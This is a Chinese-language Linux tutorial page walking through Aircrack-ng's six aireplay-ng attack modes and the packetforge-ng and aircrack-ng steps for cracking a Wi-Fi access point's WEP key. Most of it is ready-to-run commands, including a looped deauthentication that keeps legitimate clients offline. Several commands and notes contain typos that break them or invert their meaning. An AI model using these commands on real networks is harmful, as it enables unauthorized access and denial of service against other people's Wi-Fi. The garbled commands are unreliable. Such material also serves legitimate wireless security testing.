歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
Linux教程網 >> Linux基礎 >> Linux教程 >> Aircrack-ng的6中攻擊模式詳解

Aircrack-ng的6中攻擊模式詳解

日期:2017/2/28 14:34:12   编辑:Linux教程

-0 deautenticate沖突模式
使已經連接的合法客戶端端強制斷開與路由器的連接,使其重新連接。在重新連接過程中獲得驗證數據包,從而產生有效的arp數據。
如果一個客戶端連在路由器上,但是沒有人上網來產生有效數據,此時即使用-3也無法產生有效的arp數據,所以就需要用-0攻擊模式來配合-3攻擊來會被激活
aireplay-ng -0 10 -a ap_mac -c 合法客戶端mac wifi0
參數說明:10 表示發送次數(設置為0表示循環攻擊,客戶端無法正常上網)
-a設置ap的mac地址,-c設置已連接的合法客戶端的mac地址(如果要-c則所有與ap連接的客戶端全部斷線)


-1 fakeauth count 偽裝一個客戶端和ap進行連接
這是沒有客戶端研究學習的第一步,因為是沒有合法連接的客戶端,因此需要一個偽裝客戶端來和路由器連接。為讓ap接受數據包,必須使自己的網卡和ap關聯。-1偽裝客戶端連接成功夠才能用發送注入命令
aireplay-ng -1 0 -e ap_essid -a ap_mac -h my_mac wifi0
參數說明:0表示巖石0秒後連接;-e設置ap_essid;-a設置ap的mac地址 -h設置偽裝客戶端的網卡mac地址(就是自己網卡的mac地址)


-2 interactive 交互模式
這個模式集合了抓包和提取數據,發包注入三種功能
ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac wifi0
參數說明:-p設置控制幀中包含的信息(16進制),默認采用0841;-c:設置目標mac地址;-b設置ap的mac地址;-h偽裝的客戶端網卡mac地址(就是自己的mac地址)
提取包,發送注入數據包
aireplay-ng -2 -r myarp -x 1024 wifi0
參數說明:myarp:自己設置的文件名;-x 1024:發包的速度(最大為1024)


-3 arp-request注入攻擊模式
這種模式是一種抓包後分析重發的過程
aireplay-ng -3 -b ap_mac -h 合法客戶端mac -x 512 wifi0


-4 chopchop攻擊模式,用來獲得一個包含密鑰數據的xor文件
aireplay-ng -4 -b ap-mac -h my_mac wifi0


-5 fragment 碎片包攻擊模式,用來獲得PRGA(包含密鑰的後綴為xor的文件)
aireplay-ng -5 -b ap_mac -h my_mac wifi0
packetforge-ng 數據包制造程序
packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k 255.255.255.255 -l 255.255.255.255 -y niam_xor -w mrarp
參數說明:-0:偽裝arp數據包;-k:設置目標文件ip和端口;-l:設置源文件IP和端口;-y:從xor文件中讀取PRGA;name:xor文件的名字;-w設置偽裝的arp包的文件名
aircrack-ng -n 64 -b ap_mac name-01.ivs
參數說明:-n設置key長度(64/128/256/512)

Aircrack-ng 的詳細介紹:請點這裡
Aircrack-ng 的下載地址:請點這裡

Copyright © Linux教程網 All Rights Reserved